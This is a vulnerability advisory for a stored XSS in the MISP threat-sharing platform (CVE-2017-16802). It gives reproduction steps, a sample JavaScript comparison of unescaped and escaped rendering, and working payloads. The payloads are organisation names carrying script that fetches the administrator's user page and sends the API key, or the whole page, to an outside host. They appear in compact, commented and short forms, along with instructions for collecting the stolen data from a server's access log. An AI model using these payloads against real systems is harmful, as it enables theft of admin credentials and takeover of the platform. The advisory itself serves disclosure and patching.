MISP – XSS in the sharingGroupPopulateOrganisations
VULNERABILITY
XSS in the sharingGroupPopulateOrganisations function
DATE
13.11.2017
Affected Vendor
CIRCL – Computer Incident Response Center Luxembourg
Affected Product
MISP – Malware Information Sharing Platform & Open Standards For Threat Information Sharing – https://www.misp-project.org/
Vulnerable version
2.4.82
Fixed version
2.4.83
CVSS
4.4 Medium CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N
Recommendations
Update to MISP version 2.4.83
Vulnerability details
There is a stored XSS in the 'Edit Sharing Group' area of MISP: an organisation name is rendered into the organisation selector (sharingGroupPopulateOrganisations) without HTML escaping, so a name containing markup is executed in the browser of whoever edits the sharing group.
Easiest way to reproduce:
- Create a new organisation with the following name:
<script>alert('XSS');</script>
- Go to Global Actions > List Sharing Groups
- Edit an existing sharing group or add a new one
- Go to the Organisations tab
- Click Add Local Organisation
- Select
<script>alert('XSS');</script>
and move it to the right with >>
- Click Add
The same can be done from Add Remote Organisation.
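The following is an added example, not MISP's own code (the real sharingGroupPopulateOrganisations function is not reproduced here). It models the bug class behind the advisory in plain Node-runnable JavaScript: an organisation name concatenated straight into option markup, next to the same rendering with HTML escaping applied. The organisation records are constructed sample data and all function names are hypothetical.

```javascript
// Added example, not code from MISP. Models the pattern behind this advisory:
// an organisation name (attacker-controlled, e.g. received via sync) is built
// into <option> markup by string concatenation, next to the escaped form.

// Constructed sample data; org 2 carries the payload from the advisory.
const sampleOrgs = [
  { id: 1, name: "CIRCL" },
  { id: 2, name: "PUBLIC-NORTH-ATLANTIC-ORGANIZATION<script>alert('XSS');</script>" },
];

// Vulnerable pattern: untrusted text is interpolated straight into HTML, so
// a name containing markup becomes live DOM (and runs) once inserted.
function renderOptionsUnsafe(orgs) {
  return orgs
    .map((o) => '<option value="' + o.id + '">' + o.name + "</option>")
    .join("");
}

// Escape the five characters that matter in HTML text and attribute context.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened pattern: every untrusted value is escaped before concatenation.
// The browser then shows the literal text "<script>..." as the option label.
function renderOptionsSafe(orgs) {
  return orgs
    .map((o) => '<option value="' + escapeHtml(o.id) + '">' + escapeHtml(o.name) + "</option>")
    .join("");
}

// Check used below: does the rendered markup still contain a real <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Stand-alone demonstration.
console.log("unsafe:", containsScriptTag(renderOptionsUnsafe(sampleOrgs))); // true
console.log("safe:  ", containsScriptTag(renderOptionsSafe(sampleOrgs)));   // false
```

When the selector is built with jQuery, the equivalent of the escaped form is to create the element and set its label with .text(name) (or textContent on a DOM node) instead of assembling an HTML string that contains the name; how the 2.4.83 fix was actually implemented is not shown on this page.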
One realistic scenario: an organisation we trust synchronises with ours and we want to add it to a sharing group, so the organisation name it chose is rendered in our instance.
The attack therefore requires interaction by an administrator, but in return the attacker can gain full admin access to the victim MISP by stealing the admin's API key.
The API key is displayed on /users/view/me, so the payload fetches that page and exfiltrates the relevant fragment.
A plausible-looking fake organisation name is prepended so that the victim sees it in the list rather than the payload itself.
Replace https://misp2.local with a web server you control and check its access log after following the steps: the extracted page fragment arrives URL-encoded in the request path. The cross-origin request is sent even though the browser does not let the script read the response, which is all the exfiltration needs.
Follow the above steps to reproduce and put the following as the organisation name:
PUBLIC-NORTH-ATLANTIC-ORGANIZATION<script>$.get('/users/view/me',function(d){s=d.indexOf('<h2>User</h2>');e=d.indexOf('<div class="actions debugOff sideMenu',s);if(s>e)e=s*99;i=d.substring(s,e);$.get('https://misp2.local/'+escape(i));});</script>
Clear version (same payload, formatted and commented for reading):
PUBLIC-NORTH-ATLANTIC-ORGANIZATION<script>$.get('/users/view/me',function(d){
// d is the HTML of the victim's own user page, which shows the API key
pos_start = d.indexOf('<h2>User</h2>');
pos_end = d.indexOf('<div class="actions debugOff sideMenu">', pos_start);
// indexOf returns -1 if the end marker is not found; fall back to a large end offset
if(pos_start > pos_end) pos_end = pos_start*99;
interested = d.substring(pos_start, pos_end);
// send the extracted fragment to the attacker's server, URL-encoded in the path
$.get('https://misp2.local/'+escape(interested));
});</script>
Short version (exfiltrates the whole page instead of the fragment):
PUBLIC-NORTH-ATLANTIC-ORGANIZATION<script>$.get('/users/view/me',function(d){$.get('https://misp2.local/'+escape(d));});</script>
CVE
CVE-2017-16802
Credits
Dawid Czarnecki